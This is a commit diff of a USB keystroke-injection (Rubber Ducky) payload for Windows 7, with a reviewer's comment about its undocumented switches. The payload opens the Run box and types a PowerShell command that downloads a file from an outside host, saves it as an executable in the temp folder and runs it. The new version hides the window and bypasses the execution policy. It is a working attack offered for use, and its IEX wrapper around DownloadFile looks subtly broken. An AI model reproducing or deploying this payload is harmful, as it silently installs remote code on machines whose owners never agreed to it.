Updated Payload powershell wget execute (rdoc)
parent
20c17fb051
commit
072906e290
|
@ -1,22 +1,16 @@
|
||||||
Powershell Wget + Execute
|
Powershell Wget + Execute
|
||||||
|
|
||||||
Author: mubix
|
Author: mubix
|
||||||
Duckencoder: 1.2
|
Duckencoder: 1.3
|
||||||
Target: Windows 7
|
Target: Windows 7
|
||||||
Description: Opens “RUN” box, throws power shell string, enter. Supports HTTP/S, and proxies.
|
Description: Opens “RUN” box, throws power shell string, enter. Supports HTTP/S, and proxies.
|
||||||
GUI r
|
GUI r
|
||||||
DELAY 100
|
DELAY 100
|
||||||
STRING powershell (new-object System.Net.WebClient).DownloadFile('http://example.com/bob.old','$env:temp\bob.exe'); Start-Process "$env:temp\bob.exe"
|
STRING powershell -NoP -NonI -W Hidden -Exec Bypass "IEX (New-Object System.Net.WebClient).DownloadFile('http://example.com/bob.txt',\"$env:temp\bob.exe\"); Start-Process \"$env:temp\bob.exe\""
|
||||||
ENTER
|
ENTER
|
||||||
|
|
||||||
Adding two words to this makes it possible to hide the powershell window as it downloads and executes.
|
Note -windowstyle hidden hides the powershell window. Also mind the escaped quotes around $env:temp, otherwise the environment variable won't expand.
|
||||||
|
|
||||||
```
|
|
||||||
GUI r
|
|
||||||
DELAY 100
|
|
||||||
STRING powershell -windowstyle hidden (new-object System.Net.WebClient).DownloadFile('http://example.com/bob.old','$env:temp\bob.exe'); Start-Process "$env:temp\bob.exe"
|
|
||||||
ENTER
|
|
||||||
```
|
|
||||||
|
|
||||||
|
|
||||||
Edited by: Fahad Alkamli
|
Edited by: Fahad Alkamli
|
||||||
|
|
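Review bot: the note that replaces the old explanation, under the new STRING line, documents only "-windowstyle hidden" and the escaped quotes, while the command itself is written with the short form -W Hidden and also adds -NoP, -NonI and -Exec Bypass, none of which are explained. Suggest either using the long switch names the note refers to or listing what each added switch does (no profile, non-interactive, execution policy bypass), and updating the Description line, which is identical on both sides and still says only that a PowerShell string is thrown into the RUN box. The download URL also changes from bob.old to bob.txt without a word in the commit message or the note; a short line on why would help anyone reading or detecting this payload later.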